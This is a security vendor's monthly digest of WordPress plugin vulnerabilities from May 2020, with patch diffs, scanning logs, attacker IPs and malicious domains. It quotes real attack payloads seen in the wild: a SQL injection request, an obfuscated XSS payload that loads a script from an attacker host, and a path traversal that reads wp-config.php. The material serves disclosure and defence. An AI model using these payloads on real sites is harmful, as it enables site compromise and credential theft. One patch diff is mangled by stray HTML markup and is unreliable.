Vulnerabilities Digest: May 2020

Sucuri Labs Vulnerabilities

Relevant Plugins and Vulnerabilities:

PluginVulnerabilityPatched VersionInstalls
WP Product ReviewUnauthenticated Stored XSS3.7.640000
Form Maker by 10WebAuthenticated SQL Injection---100000
Add-on SweetAlert Contact Form 7Authenticated XSS1.0.820
Paid Memberships ProAuthenticated SQL Injection2.3.390000
Visual ComposerAuthenticated XSS2780000
Team MembersAuthenticated XSS5.0.440000
Photo Gallery by 10WebUnauthenticated SQL Injection1.5.55300000
Login/Signup PopupAuthenticated XSS1.510000
Easy TestimonialsAuthenticated Stored XSS3.630000
WooCommerceUnescaped Metadata4.1.05000000
Page Builder by SiteOriginCSRF to XSS2.10.161000000
ChopsliderAuthenticated SQL Injection---200
Elementor ProAuthenticated File Upload2.9.4100000
LearnPressPrivilege Escalation3.2.6.980000
ElementorAuthenticated Stored XSS2.9.84000000
AvadaAuthenticated Stored XSS6.2.3500000
Ninja FormsCSRF to Stored XSS3.4.24.21000000
Advanced Order Export For WooAuthenticated XSS3.1.490000
Quick Page/Post redirectAuthenticated Settings Update---100000
Ultimate Addons for ElementorRegistration Bypass1.24.2100000
WTI Like PostAuthenticated XSS---10000
WP-Advanced-SearchAuthenticated SQL Injection3.3.71000
Gmedia Photo GalleryAuthenticated XSS1.18.510000

Highlights for May 2020

  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an Unauthenticated Stored Cross Site Scripting in WP Product Review caused by a lack of protection in a rest route definition and improper handling of user input.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:

181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 

185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

Patch (version 3.7.6):

Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
===================================================================
--- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
+++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
@@ -97,4 +97,7 @@
                 'methods'  => 'POST',
                 'callback' => array( $this, 'update_review_callback' ),
+                'permission_callback' => function () {
+                    return current_user_can( 'edit_posts' );
+                },
                 'args'     => array(
                     'id' => array(

---

Index: wp-product-review/trunk/includes/functions.php
===================================================================
--- a/wp-product-review/trunk/includes/functions.php
+++ b/wp-product-review/trunk/includes/functions.php
@@ -229,5 +229,5 @@
         }
         ?>
-        <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
+        <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
             <img
                 src="<?php echo esc_attr( $src ); ?>"

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor:

69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1" 

45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1" 

62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1" 

62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

[...]

Photo Gallery by 10Web

An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.

Patch (version 1.5.55):

Index: photo-gallery/trunk/frontend/models/model.php
===================================================================
--- a/photo-gallery/trunk/frontend/models/model.php
+++ b/photo-gallery/trunk/frontend/models/model.php
@@ -197,32 +197,32 @@

   public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) {
-    if ( $albums_per_page < 0 ) {
+    if ( $albums_per_page < 0 ) {
       $albums_per_page = 0;
     }
     global $wpdb;
-    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
-    if( $sort_by == 'random' || $sort_by == 'RAND()' ) {
-      $order_by = 'ORDER BY RAND()';
-    }
-    $search_where = '';
-    $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) );
-    if ( !empty($search_value) ) {
-      $search_keys = explode(' ', $search_value);
+    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
+    if ( $sort_by == 'random' || $sort_by == 'RAND()' ) {
+      $order_by = 'ORDER BY RAND()';
+    }
+    $search_where = '';
+    $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) );
+    if ( !empty( $search_value ) ) {
+      $search_keys = explode( ' ', $search_value );
       $alt_search = '(';
       $description_search = '(';

Payload Used by Attackers:

185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:

css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com

The following IPs have also been associated with this campaign:

79.133.202.70
154.43.128.23
185.162.127.248
51.83.70.152
213.159.210.170
139.162.28.41
139.99.169.192
185.217.0.224
84.238.108.177
62.210.180.8
[...]

 

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (From Last Year)
139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12
WP Quick Booking Manager (from 4 years ago)
139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 
Duplicator Download
62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1" 

Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.

To mitigate threat, we strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.